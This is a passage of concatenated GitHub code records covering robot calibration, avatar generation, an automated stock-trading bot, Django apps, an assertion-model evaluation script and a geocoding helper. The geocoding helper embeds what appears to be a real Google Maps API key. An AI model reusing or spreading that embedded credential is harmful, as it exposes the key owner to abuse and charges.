obs1[\"tvec\"])\n H2 = utils.H_rvec_tvec(obs2[\"rvec\"], obs2[\"tvec\"])\n H1inv, H2inv = np.linalg.inv(H1), np.linalg.inv(H2)\n\n num_links = self.theta_nom.size\n theta_nom1 = np.array(list(obs1[\"q\"])) + self.theta_nom\n T1 = ParameterEstimator.get_T__i0(num_links, theta_nom1, self.d_nom, self.r_nom, self.alpha_nom)\n\n theta_nom2 = np.array(list(obs2[\"q\"])) + self.theta_nom\n T2 = ParameterEstimator.get_T__i0(num_links, theta_nom2, self.d_nom, self.r_nom, self.alpha_nom)\n\n AA = np.linalg.inv(T1) @ T2\n # BB = H1 @ H2inv\n # BB = H1inv @ H2\n BB = H2 @ H1inv\n # BB = H2inv @ H1\n\n self.ukf.Update(AA, BB)\n self.cntr = self.cntr + 1\n except:\n return\n if self.ukf.consistency[-1] > 0.03:\n print(\"fuggup\")\n if self.cntr>100:\n print(\"ukf.x {}\".format(self.cntr))\n print(self.ukf.x)\n print(\"\\n\")\n import matplotlib.pyplot as plt\n plt.plot(self.ukf.consistency)\n plt.show()\n print(\"test\")\n\n\n\n\n# Node\nif __name__ == \"__main__\":\n rospy.loginfo('Launching Extrinsic Calibrator')\n calibrator = ExtrinsicCalib()\n\n while not rospy.is_shutdown():\n 
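# Each pass pops one marker observation pair, builds the relative robot\n        # and camera motions, and feeds them to the UKF (see\n        # process_observations above); the loop runs unthrottled here.\n        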
calibrator.process_observations()\n","repo_name":"arminwessel/kident2","sub_path":"src/extrinsic_cal.py","file_name":"extrinsic_cal.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"72649057269","text":"#!/usr/bin/env python\n\n\"\"\"\nAn 8-bit avatar generator.\n\"\"\"\n\nfrom __future__ import division\n\nimport argparse\nimport hashlib\nimport numpy\nimport png\n\ndef chunk(s, n):\n    \"\"\"\n    Chunks a string into fragments n characters long.\n    \"\"\"\n    for i in range(0, len(s), n):\n        yield s[i:i+n]\n\ndef map_coords(s, xmax = 4, ymax = 8):\n    \"\"\"\n    Transforms two hexadecimal digits (s) to (x, y) coordinates, e.g.,\n    \n    10 => (1, 0)\n    b3 => (3, 3)\n    2f => (2, 7)\n    \n    Each digit is reduced modulo xmax or ymax so the point always fits\n    on the pixel grid.\n    \"\"\"\n    # Convert the hex digits to ints up front; the old str-to-int comparison\n    # only worked under Python 2, where it always fell into the modulo branch.\n    x = int(s[0], 16) % xmax\n    y = int(s[1], 16) % ymax\n    return (x,y)\n\ndef get_coords(md5hash):\n    chunked = list(chunk(md5hash, 2))\n    coords = []\n    for c in chunked:\n        coords.append(map_coords(c))\n    return list(set(coords))\n\ndef choose_foreground(md5hash):\n    \"\"\"\n    Placeholder function for something more advanced.\n    \"\"\"\n    return pixelize(md5hash[0:6])\n\ndef choose_background(md5hash):\n    \"\"\"\n    Placeholder function for something more advanced.\n    \"\"\"\n    return pixelize(md5hash[6:12])\n\ndef colour_distance(rgb1, rgb2):\n    \"\"\"\n    Returns the Euclidean distance between two RGB tuples (R, G, B).\n    \n    Note that this is a first-order estimate; human colour perception is \n    non-Euclidean.\n    \"\"\"\n    dR = (rgb1[0] - rgb2[0])\n    dG = (rgb1[1] - rgb2[1])\n    dB = (rgb1[2] - rgb2[2])\n    d = numpy.sqrt(dR**2 + dG**2 + dB**2)\n    return d\n    \ndef pixelize(colour):\n    \"\"\"\n    Takes a colour in #RRGGBB and returns a pixel value as an RGB tuple.\n    \"\"\"\n    components = list(chunk(colour, 2))\n    return tuple([int(x, 16) for x in components])\n\ndef write_png(arr, filename, palette):\n    \"\"\"\n    Write a binary pixel array to a PNG file.\n    \"\"\"\n    f = open(filename, 'wb')\n    w = png.Writer(palette = palette, bitdepth=1, size=arr.shape)\n    w.write(f, arr)\n    \ndef fill_pixel_array(coords, size):\n    \"\"\"\n    Construct an avatar pixel array of arbitrary size.\n    \"\"\"\n    arr = numpy.zeros((10, 5))\n    for c in coords:\n        x = c[0]\n        y = c[1]\n        arr[y+1, x+1] = 1\n    arr_mirror = numpy.fliplr(arr)\n    arr = numpy.hstack((arr, arr_mirror))\n    # Scale the array, e.g. 
for a scaling factor of n = 2:\n    #\n    # array([1, 0],     =>    array([1, 1, 0, 0],\n    #       [1, 1])                 [1, 1, 0, 0],\n    #                               [1, 1, 1, 1],\n    #                               [1, 1, 1, 1])\n    n = size // arr.shape[0]  # integer factor: numpy.ones needs integer dimensions\n    arr = numpy.kron(arr, numpy.ones((n, n)))\n    return arr\n\ndef generate_avatar(md5hash, filename, size):\n    \"\"\"\n    Generate an 8-bit avatar from a given MD5 hash.\n    \"\"\"\n    fg = choose_foreground(md5hash)\n    bg = choose_background(md5hash)\n    coords = get_coords(md5hash)\n    imgarray = fill_pixel_array(coords, size) \n    write_png(imgarray, filename, [bg, fg])\n\ndef main():\n    # CLI\n    parser = argparse.ArgumentParser(description='Generate a retro avatar.')\n    parser.add_argument('email')\n    parser.add_argument('--output', default='avatar.png')\n    parser.add_argument('--size', default=100, type=int)\n    args = parser.parse_args()\n    \n    email = args.email\n    size = args.size\n    md5hash = hashlib.md5(email).hexdigest()\n    \n    generate_avatar(md5hash, args.output, args.size)\n\nif __name__ == '__main__':\n    main()\n    \n","repo_name":"gistable/gistable","sub_path":"all-gists/3886519/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"}
{"seq_id":"11682693968","text":"#!/usr/bin/env python3\nprint (\"Importing...\")\n\nimport time\nimport Basics\nfrom stockVal import get_current_price, findTrend, fetchData\nfrom config import api\nimport datetime\n\ndef find_time():\n    now = datetime.datetime.now()\n    current_time = int(now.strftime(\"%H%M\"))\n    print(now.strftime(\"%H:%M:%S\"))\n    return current_time \n\nprint('\"\" = default option')\nclear_p = input('Clear portfolio? (y/\"n\")') == 'y'\nif input('Wait for market open? (\"y\"/n)') != 'n':\n    print(\"Waiting for market open...\")\n    while True:\n        t = find_time()\n        if t >= 625 and t <= 800:\n            break\n        time.sleep(60)\n    while True:\n        t = find_time()\n        if t == 630:\n            print('Start time: {}'.format(t))\n            break\n        time.sleep(5)\n    print(\"Market has opened. Beginning program...\")\n\nc_positions = api.list_positions()\nprint(\"---\")\nprint(\"Scanning Open Positions...\")\np_data = Basics.stockAnal([[p.symbol] for p in c_positions])\nprint(\"---\")\np_num = 5-len(c_positions)\nprint('{} open slots available'.format(p_num))#number of stocks that need replacing (open slots)\norders = api.list_orders()\nb = [p.symbol for p in c_positions]\n\ndef get_order_id(ticker):\n    for order in orders:\n        if order.symbol == ticker:\n            return order.id\ndef close_position(ticker, order_id, shares):\n    try:\n        api.cancel_order(order_id)\n    except:\n        print('No open trailing order for {}'.format(ticker))\n    time.sleep(5)\n    try:\n        api.close_position(ticker, qty = abs(shares))\n    except:\n        print('No open position for {}.'.format(ticker))\n\nprint(\"Filtering open positions\")\nfor stock in tuple(zip(c_positions,p_data)):\n    print('-')\n    ticker, value, shares = stock[0].symbol, float(stock[0].market_value), int(stock[0].qty)\n    order_id = get_order_id(ticker)  # look the order up first so the except branch can use it\n    try:\n        price = get_current_price(ticker)\n    except:\n        print('Info not received for {}. Closing position...'.format(ticker))\n        close_position(ticker, order_id, stock[1][11])\n        continue  # price is unknown, so skip the trend checks for this stock\n    trend = findTrend(8, fetchData(ticker), price)\n    if value > 0:\n        line = stock[1][2]-((stock[1][6]*stock[1][3])*0.001)\n        if trend < 0:\n            print('{} trend reversed. Closing position...'.format(ticker))\n            close_position(ticker, order_id, shares)\n            continue\n        elif price >= line:\n            print('{} near resistance line. 
Closing position...'.format(ticker))\n            close_position(ticker, order_id, shares)\n            continue\n    elif value < 0:\n        line = stock[1][3]+((stock[1][6]*stock[1][2])*0.001)\n        if trend > 0:\n            print('{} trend reversed. Closing position...'.format(ticker))\n            close_position(ticker, order_id, shares)\n            continue\n        elif price <= line:\n            print('{} near support line. Closing position...'.format(ticker))\n            close_position(ticker, order_id, shares)\n            continue\n    print(\"Holding {}\".format(ticker))\n\n\n# Sells any open position that has hit its support/resistance line or whose trend has reversed\nprint(\"---\")\n\nif clear_p:\n    p_num = 5\n    print(\"---\")\n    print(\"Cleaning portfolio...\")\n    api.cancel_all_orders()\n    api.close_all_positions()\nelse:\n    if p_num == 0:\n        print(\"No stocks need replacing. Quitting program...\")\n        quit()\n\naccount = api.get_account()\nbuying_power = int(float(account.cash)) #set to 1000 during actual trading\nprint(\"Buying power: {}\".format(buying_power))\nconfig = Basics.ConvertJson(Basics.directory + \"json/Var.json\")\ndate = datetime.datetime.date(datetime.datetime.now()).strftime(\"%m%d%y\")\n\nbegin_time = datetime.datetime.now()\nfinviz_stocks = [[x] for x in Basics.FindTopStocks(b)]\nStocks = Basics.stockCalc(finviz_stocks,buying_power,date)[:p_num]\nprint(\"It took this long to scan Stocks: {}\".format(datetime.datetime.now() - begin_time))\nprint(\"---\")\nprint(\"Stock picks:\")\nprint(Stocks)\n\nif config['Date'] == date:\n    if input(\"Do you still want to buy today? (y/n)\") == \"n\":\n        quit()\n\nprint(\"---\")\nprint(\"Buying Stocks...\")\ndef BuyAllStock():\n    for stock in Stocks:\n        if stock[-2] > 0:\n            api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'buy', type = 'market')\n            t = datetime.datetime.now().strftime(\"%H:%M:%S\")\n            print(\"Bought {} shares of {}. Time: {}; \".format(stock[-2], stock[0], t))\n        else:\n            api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'sell', type = 'market')\n            t = datetime.datetime.now().strftime(\"%H:%M:%S\")\n            print(\"Sold {} shares of {}. 
Time: {}; \".format(stock[-2], stock[0], t))\n print(\"Waiting for API\")\n time.sleep(120)\n for stock in Stocks:\n if stock[-2] > 0:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'sell', type = 'trailing_stop', time_in_force = 'gtc', trail_percent = round(stock[6]*(1/2),2)) \n print(\"Trailing order set for {} shares of {}; \".format(stock[-2], stock[0]))\n else:\n api.submit_order(symbol = stock[0], qty = abs(stock[-2]), side = 'buy', type = 'trailing_stop', time_in_force = 'gtc', trail_percent = round(stock[6]*(1/3),2)) \n print(\"Trailing order set for {} shares of {}; \".format(stock[-2], stock[0]))\nBuyAllStock()\n\n","repo_name":"G-Knanochaos/Stock-Trading-Bot","sub_path":"Swing-Trading/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"} +{"seq_id":"72531827828","text":"# # How the input() Function Works\n# message = input(\"Tell me something, and I will repeat it back to you: \")\n# print(message)\n\n# # Letting the User Choose When to Quit\n# prompt = \"\\nTell me something, and I will repeat it back to you:\\nEnter 'quit' to end the program.\\n\"\n# message = \"\"\n# while message != 'quit':\n# \tmessage = input(prompt)\n# \tif message != 'quit': print(message)\n\n# Using a Flag\nprompt = \"\\nTell me something, and I will repeat it back to you:\\nEnter 'quit' to end the program.\\n\"\nflag = True\nwhile flag:\n\tmessage = input(prompt)\n\tif message == 'quit':\n\t\tflag = False\n\telse:\n\t\tprint(message)","repo_name":"TrongPhamDA/Python-Crash-Course-2nd-edition","sub_path":"chapter_07/parrot.py","file_name":"parrot.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"4298880816","text":"from django.urls import path\r\nfrom .views import EventCreateForAdmin, EventCreateForUser,LeadCreateViewForAdmin, LeadCreateViewForUser, detail_view, lead_list, events_list, lead_update_admin, lead_update_user, LeadDeleteView\r\n\r\n\r\napp_name = \"leads\"\r\n\r\nurlpatterns = [\r\n path('', lead_list, name='lead_list'),\r\n\r\n\r\n path('create/',LeadCreateViewForUser.as_view() , name='lead_create_user'),\r\n path('createAd/',LeadCreateViewForAdmin.as_view() , name='lead_create_admin'),\r\n path('<pk>/update', lead_update_user,name='lead_update_user'),\r\n path('<pk>/updateAd', lead_update_admin,name='lead_update_admin'),\r\n path('<pk>/delete/', LeadDeleteView.as_view(), name='lead_delete'),\r\n path('<int:pk>/', detail_view,name='lead_detail'),\r\n\r\n\r\n\r\n\r\n\r\n path('events/createUs', EventCreateForUser.as_view(),name='event_create_user'),\r\n path('events/createAd', EventCreateForAdmin.as_view(),name='event_create_admin'),\r\n\r\n\r\n \r\n \r\n path('events_list', events_list, name='events_list'),\r\n\r\n\r\n \r\n\r\n\r\n \r\n]","repo_name":"hosnibelguithh/django_astr2","sub_path":"leads/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38218150547","text":"from django.db import models\nfrom django.utils.timezone import now\n\nfrom base.models import EntityMixin\nfrom gatheros_event.models.mixins import GatherosModelMixin\n\n\nclass SyncItem(GatherosModelMixin, EntityMixin, models.Model):\n class Meta:\n verbose_name = 'item de sincronização'\n verbose_name_plural = 'items de sincronização'\n unique_together = 
('object_id', 'object_type',)\n\n CREATION = 'creation'\n EDITION = 'edition'\n DELETION = 'deletion'\n\n ACTION_TYPES = (\n (CREATION, 'Criação'),\n (EDITION, 'Edição'),\n (DELETION, 'Exclusão'),\n )\n\n MODEL_PERSON = 'gatheros_event.person'\n MODEL_SUBSCRIPTION = 'gatheros_subscription.subscription'\n MODEL_TRANSACTION = 'payment.transaction'\n MODEL_TRANSACTION_STATUS = 'payment.transaction_status'\n MODEL_ATTENDANCE_SERVICE = 'attendance.attendance_service'\n MODEL_CHECKIN = 'attendance.checkin'\n MODEL_CHECKOUT = 'attendance.checkout'\n\n MODEL_SURVEY_QUESTION = 'survey.question'\n MODEL_SURVEY_OPTION = 'survey.option'\n MODEL_SURVEY_AUTHOR = 'survey.author'\n MODEL_SURVEY_ANSWER = 'survey.answer'\n\n MODEL_TYPES = (\n (MODEL_PERSON, MODEL_PERSON),\n (MODEL_SUBSCRIPTION, MODEL_SUBSCRIPTION),\n (MODEL_TRANSACTION, MODEL_TRANSACTION),\n (MODEL_TRANSACTION_STATUS, MODEL_TRANSACTION_STATUS),\n (MODEL_ATTENDANCE_SERVICE, MODEL_ATTENDANCE_SERVICE),\n (MODEL_CHECKIN, MODEL_CHECKIN),\n (MODEL_CHECKOUT, MODEL_CHECKOUT),\n )\n\n process_type = models.CharField(\n max_length=10,\n verbose_name='tipo de processamento',\n choices=ACTION_TYPES,\n # required\n blank=True,\n null=True,\n )\n\n process_time = models.DateTimeField(\n verbose_name='data e hora de processamento',\n default=now,\n blank=True,\n null=False,\n editable=False,\n )\n\n object_type = models.TextField(\n verbose_name='Tipo de objeto',\n choices=MODEL_TYPES,\n # required\n blank=True,\n null=True,\n )\n\n object_id = models.TextField(\n verbose_name='ID do objeto',\n # required\n blank=True,\n null=True,\n )\n\n object_repr = models.TextField(\n verbose_name='Repr. do objeto',\n # required\n blank=True,\n null=True,\n )\n\n content = models.TextField(\n verbose_name='Conteúdo a ser sincronizado',\n blank=True,\n null=True,\n )\n\n def __str__(self):\n return '{} (ID: {})'.format(self.object_repr, self.object_id)\n","repo_name":"hugoseabra/congressy","sub_path":"sync_client/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4073582424","text":"\nimport argparse, csv, os, random\nimport pandas as pd\nimport subprocess as sp\nimport numpy as np\n\nimport model.assertion_data as assertion_data\n\npd.options.mode.chained_assignment = None\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\n\ndef main():\n random.seed(0)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('input_data')\n parser.add_argument('metadata')\n parser.add_argument('model_name')\n args = parser.parse_args()\n\n base_dir = os.path.dirname(args.input_data)\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n\n assert base_dir == os.path.dirname(args.metadata)\n\n fm_test_pairs = pd.read_csv(args.input_data).fillna('')\n metadata = pd.read_csv(args.metadata).fillna('')\n metadata['id'] = metadata.project + metadata.bug_num.astype(str) + metadata.test_name\n\n methods, tests, docstrings = fm_test_pairs.focal_method, fm_test_pairs.test_prefix, fm_test_pairs.docstring\n\n print('preparing assertion model inputs')\n vocab = np.load('data/evo_vocab.npy', allow_pickle=True).item()\n assert_input_file = os.path.join(base_dir, 'assert_model_inputs.csv')\n if not os.path.exists(assert_input_file):\n method_test_assert_data, idxs = assertion_data.get_model_inputs(tests, methods, vocab, metadata)\n 
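# One row per test: the metadata columns identify the (project, bug,\n        # test) triple, while 'source'/'target' hold the strings fed to the\n        # assertion model by run_eval.sh below.\n        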
assert_inputs_df = pd.DataFrame(method_test_assert_data,\n                                        columns=[\"project\", \"bug_num\", \"test_name\", \"test_prefix\", \"source\", \"target\"])\n        assert_inputs_df.to_csv(assert_input_file)\n\n    sp.run(f'bash ./model/{args.model_name}/run_eval.sh {assert_input_file}'.split(), env=os.environ.copy())\n\n    assert_pred_file = os.path.join(base_dir, \"{}_preds\".format(args.model_name), \"assertion_preds.csv\")\n    result_df = pd.read_csv(assert_pred_file)\n    except_preds = [0] * len(result_df)\n    result_df['except_pred'] = except_preds\n\n    # write oracle predictions\n    pred_file = os.path.join(base_dir, '{}_oracle_preds.csv'.format(args.model_name))\n    result_df.to_csv(pred_file)\n\n    print(f'wrote oracle predictions to {pred_file}')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"DIO157128/LLM4Assertion","sub_path":"toga/zenodo_replication_package/toga.py","file_name":"toga.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"37998851121","text":"import requests\nimport math\n\ndef fromAddress(address):\n\tmy_api_key = 'AIzaSyC9ZPnhBLoe4SZmkghgQKUJrDKtm2Cu-iE'\n\tapi_address = 'https://maps.googleapis.com/maps/api/geocode/json?address='+\\\n\t\taddress.replace(\" \",\"+\") + \"+Western+Cape+South+Africa\" + '&key=' + my_api_key\n\tresponse = requests.get(api_address)\n\tresp_json_payload = response.json()\n\tif resp_json_payload['status'] == 'OK':\n\t\tlat = resp_json_payload['results'][0]['geometry']['location']['lat']\n\t\tlng = resp_json_payload['results'][0]['geometry']['location']['lng']\n\t\treturn Coordinate(lat, lng)\n\telse:\n\t\treturn None\n\nclass Coordinate:\n\tdef __init__(self, latitude=0, longitude=0):\n\t\tself.lat = latitude\n\t\tself.long = longitude\n\n\tdef distance(self, other):\n\t\t#www.movable-type.co.uk/scripts/latlong.html\n\t\tR = 6371*10**3\n\t\tp1 = self.lat*math.pi/180\n\t\tp2 = other.lat*math.pi/180\n\t\td1 = (other.lat-self.lat)*math.pi/180\n\t\td2 = (other.long-self.long)*math.pi/180\n\t\t# haversine formula: both angular deltas are halved inside the sines\n\t\ta =\tmath.sin(d1/2)*math.sin(d1/2)+math.cos(p1)*math.cos(p2)*math.sin(d2/2)*math.sin(d2/2)\n\t\tc = 2*math.atan2(math.sqrt(a),math.sqrt(1-a))\n\t\td =\tR*c\n\t\treturn\td\n\n\tdef toString(self):\n\t\treturn \"(\" + str(self.long) + \", \" + str(self.lat) + \")\"\n","repo_name":"stellenbosch-sbitc/alexa-sbitc","sub_path":"router/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"28240442977","text":"from django.db import models\nfrom multiselectfield import MultiSelectField\n\nclass Mission(models.Model):\n    LEVEL = [\n        (1, \"Level1\"),\n        (2, \"Level2\"),\n        (3, \"Level3\"),\n        (4, \"Level4\")\n    ]\n    TAGS = [\n        (\"exercise\", \"운동\"),\n        (\"transport\", \"교통\"),\n        (\"cleaning\", \"청소\"),\n        (\"diet\", \"식생활\"),\n        (\"leisure\", \"여가생활\"),\n        (\"digital\", \"디지털\"),\n        (\"save\", \"절약\")\n    ]\n    name = models.CharField(max_length=20)\n    level = models.IntegerField(choices=LEVEL)\n    description = models.CharField(max_length=100)\n    tag = MultiSelectField(choices=TAGS, max_length=20, default=\"\")\n\n    def __str__(self):\n        return self.name","repo_name":"minha62/Ecouni","sub_path":"missions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"73625553588","text":"#!/usr/bin/env python3 -u\n# -*- coding: utf-8 
-*-\n\nimport csv\nimport getopt\nimport glob\nimport json\nimport logging\nimport logging.handlers\nimport os\nimport re\nimport sys\nimport time\nfrom collections import Counter\n\nimport bs4\nimport nltk\nimport pymysql\nfrom scrapy.cmdline import execute\n\nG_CUR_FILE_PATH = os.path.split(os.path.realpath(__file__))[0]\nos.chdir(G_CUR_FILE_PATH)  # initialize the working directory\n\nimport myutil\n\nDETAIL_FILE = 'detail.csv'\nSUMMARY_FILE = 'summary.csv'\n\n# keywords to search for\nKW_ARR = [\n    '集客', '集客支援', 'デジタルマーケティング', 'デジタルマーケティング支援', 'SEO',\n    'SEM', 'Web', 'Webデザイン', 'ウェブ', 'ウェブデザイン', 'EC', 'イーコマース',\n    'eコマース', '運営', 'メディア', '戦略', '企画', 'プランニング', '広告', '代行',\n    'UI', 'UX', 'データ', 'アクセス解析', 'サイト解析', 'ウェブ改善', 'ウェブ解析',\n    '分析', '最適化', 'グロースハッカー', 'コンサルティング', 'ソフトウェア', 'IT',\n    'マーケティング', 'ECサイト', '検索エンジン', 'プロモーション', 'リスティング',\n    'ランディングページ', 'コンテンツ', 'アフィリエイト', 'インターネット', '代理店',\n    '営業', 'データ', 'コミュニケーション', 'クリエーティブ', 'デジタル', 'PR',\n    'ユーザーエクスペリエンス', '戦略立案', 'CRM', 'アナリティクス', 'クリエイター',\n    'マーケター', 'デザイナー', 'ECサイト', 'インバウンドビジネス', 'インバウンドマーケティング'\n]\n# pre-process the keywords: lower-case all English text\nKW_ARR = [kw.strip().lower() for kw in KW_ARR]\n\n# some special keywords as (key_word, pattern) pairs\nSPCE_KW_ARR = [\n    (r'A/B test'.strip().lower(), r'\\bA/B\\stest\\b'),\n    (r'A/B テスト'.strip().lower(), r'\\bA/B\\sテスト'),\n]\nSPCE_KEY_ARR = [key for key, _ in SPCE_KW_ARR]\n\nALL_KW_ARR = KW_ARR + SPCE_KEY_ARR\n\nEXT_DETAIL_KW_ARR = [\n    'email', 'email_suffix', 'homepage', 'profile_domains', 'company',\n    'user_name', 'phone', 'profile_owner', 'last_month_pv', 'last_month_events',\n    'heatmap_count', 'page_group_count', 'conversion_count', 'login_last_30days',\n    'total_kw_hits', 'distinct_kw_hits'\n]\n\n# columns shown in the detail table\nSHOW_DETAIL_KW_ARR = EXT_DETAIL_KW_ARR + ALL_KW_ARR\n\nEXT_SUMMARY_KW_ARR = [\n    'label', 'email_suffix', 'homepage', 'email_count',\n    'company', 'last_month_pv', 'last_month_events', 'heatmap_count',\n    'page_group_count', 'conversion_count', 'login_last_30days',\n    'total_kw_hits', 'distinct_kw_hits'\n]\n\n# columns shown in the summary table\nSHOW_SUMMARY_KW_ARR = EXT_SUMMARY_KW_ARR + ALL_KW_ARR\n\n\ndef my_excepthook(exc_type, exc_value, traceback):\n    logging.error(\n        \"Uncaught Exception\", \n        exc_info=(exc_type, exc_value, traceback)\n    )\n\n\ndef make_dir(name):\n    if not os.path.exists(name):\n        os.mkdir(name)\n\n\ndef init_log_config():\n    logging.basicConfig(\n        level=logging.INFO,\n        format='%(asctime)s [%(filename)s %(funcName)s %(lineno)d] %(levelname)s: %(message)s',\n        datefmt='[%m/%d %H:%M:%S]'\n    )\n\n    #################################################################################################\n    formatter = logging.Formatter(\n        '%(asctime)s [%(filename)s %(funcName)s %(lineno)d] %(levelname)s: %(message)s')\n\n    debug_rotating = logging.handlers.RotatingFileHandler(\n        \"log/debug.log\", maxBytes=1024*1024*20, backupCount=3, delay=True)\n    debug_rotating.set_name('debug')\n    debug_rotating.setLevel(logging.DEBUG)\n    debug_rotating.setFormatter(formatter)\n    logging.getLogger().addHandler(debug_rotating)\n\n    info_rotating = logging.handlers.RotatingFileHandler(\n        \"log/info.log\", maxBytes=1024*1024*10, backupCount=3, delay=True)\n    info_rotating.set_name('info')\n    info_rotating.setLevel(logging.INFO)\n    info_rotating.setFormatter(formatter)\n    logging.getLogger().addHandler(info_rotating)\n\n    error_rotating = logging.handlers.RotatingFileHandler(\n        \"log/error.log\", maxBytes=1024*1024*10, backupCount=3, delay=True)\n    error_rotating.set_name('error')\n    error_rotating.setLevel(logging.WARNING)\n    error_rotating.setFormatter(formatter)\n    logging.getLogger().addHandler(error_rotating)\n\n    
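# Three rotating files, filtered by minimum level (DEBUG+, INFO+, WARNING+).\n    # delay=True postpones opening each file until the first record is emitted,\n    # which is why make_dir(\"log\") can safely run afterwards.\n    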
logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n    make_dir(\"log\")\n\n\nclass ArgsException(Exception):\n    pass\n\n\nclass MyException(Exception):\n    pass\n\n\ndef spider_data():\n    try:\n        # execute(['scrapy', 'crawl', 'quotes'])\n        execute(['scrapy', 'crawl', 'partner']) \n    except Exception as e:\n        logging.error(e)\n\n\n@myutil.singleton\nclass HandleStore(object):\n\n    def __init__(self):\n        self.detail_fields = SHOW_DETAIL_KW_ARR\n        self.summary_fields = SHOW_SUMMARY_KW_ARR\n        make_dir('record')\n\n    def handle_file_name(self, file_name):\n        record_file = os.path.join('.', 'record', file_name)\n        if os.path.exists(record_file):\n            file_suffix = str(time.time())\n            os.rename(record_file, record_file+r'.'+file_suffix)\n\n        if os.path.exists(record_file):\n            raise MyException('%s rename error' % file_name)\n\n        return record_file\n\n    def write_detail_head(self, file_name, mode='w'):\n        with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n            writer = csv.DictWriter(\n                f,\n                dialect=myutil.MyDialect,\n                fieldnames=self.detail_fields\n            )\n            writer.writeheader()\n\n    def write_summary_head(self, file_name, mode='w'):\n        with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n            writer = csv.DictWriter(\n                f,\n                dialect=myutil.MyDialect,\n                fieldnames=self.summary_fields\n            )\n            writer.writeheader()\n\n    def write_detail_row(self, file_name, row, mode='a'):\n        with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n            writer = csv.DictWriter(\n                f,\n                dialect=myutil.MyDialect,\n                fieldnames=self.detail_fields\n            )\n            writer.writerow(row)\n\n    def write_summary_row(self, file_name, row, mode='a'):\n        with open(file_name, mode, newline='', encoding='utf-8-sig') as f:\n            writer = csv.DictWriter(\n                f,\n                dialect=myutil.MyDialect,\n                fieldnames=self.summary_fields\n            )\n            writer.writerow(row)\n\n\n@myutil.singleton\nclass LoadSQLData(object):\n    def __init__(self):\n        self.clear()\n        self.load_data()\n\n    def clear(self):\n        self.ref_site_status = {}\n        self.user_login_log = {}\n        self.usrelationship = {}\n        self.user_detail = []\n        self.dd = {}\n        self.email2uid = {}\n\n    def load_data(self):\n        # load the user detail table\n        with open(myutil.SAVE_FILE, 'r', encoding='utf-8-sig') as f:\n            reader = csv.DictReader(f)\n            for row in reader:\n                self.email2uid[row['email']] = int(row['uid'])\n                self.user_detail.append(row)\n\n        # load the pre-computed dd csv data\n        dd_file = os.path.join('record', 'dd.csv')\n        with open(dd_file, 'r', encoding='utf-8-sig') as f:\n            reader = csv.DictReader(f)\n            for row in reader:\n                self.dd[row['email']] = row\n\n        # the data below is loaded from the production database\n        db_info = myutil.get_db_info()\n        conn = pymysql.connect(\n            host=db_info['host'],\n            port=db_info['port'],\n            user=db_info['user'],\n            password=db_info['passwd'],\n            # db=MYSQL_DB\n            charset='utf8mb4',\n            cursorclass=pymysql.cursors.DictCursor\n        )\n\n        # all profiles belonging to each user\n        with conn.cursor() as cursor:\n            sql = '''\n                select uid, siteid, type from ptmind_common.ptengine_usrelationship\n                where uid is not null;\n            '''\n            cursor.execute(sql)\n            for row in cursor:\n                uid = row['uid']\n                siteid = row['siteid']\n                ptype = row['type']\n                if uid in self.usrelationship.keys():\n                    self.usrelationship[uid].append((siteid, ptype))\n                else:\n                    self.usrelationship[uid] = [(siteid, ptype)]\n\n        # profile status table\n        with conn.cursor() as cursor:\n            sql = '''\n                SELECT seqid, primary_domain FROM ptmind_common.ref_site_status\n                where user_id is not null;\n            '''\n            cursor.execute(sql)\n            for row in cursor:\n                seqid = row['seqid']\n                primary_domain = row['primary_domain'].strip()\n                if seqid not in self.ref_site_status.keys():\n                    self.ref_site_status[seqid] 
= primary_domain.split(r',')\n\n        # user login history table (disabled)\n        # with conn.cursor() as cursor:\n        #     db_name = 'ptmind_user_service'\n        #     if myutil.get_run_type() == 'release':\n        #         db_name = 'ptmind-user-service'\n\n        #     time_before_30 = int((time.time() - 86500*30) * 1000)\n\n        #     sql = '''\n        #         select uid, login_time from %s.user_login_log\n        #         where uid is not null and login_time > %s;\n        #     ''' % (db_name, time_before_30)\n        #     cursor.execute(sql)\n        #     for row in cursor:\n        #         user_id = row['uid']\n        #         login_time = row['login_time']\n        #         if user_id in self.user_login_log.keys():\n        #             self.user_login_log[user_id].append(login_time)\n        #         else:\n        #             self.user_login_log[user_id] = [login_time]\n\n        conn.close()\n\n    def get_user_detail(self):\n        return self.user_detail\n\n    def is_profile_owner(self, uid):\n        if uid in self.usrelationship.keys():\n            for _siteid, ptype in self.usrelationship[uid]:\n                if ptype == 0:\n                    return 'Y'\n\n        return 'N'\n\n    def get_profile_domains(self, email, ftype='detail'):\n        uid = 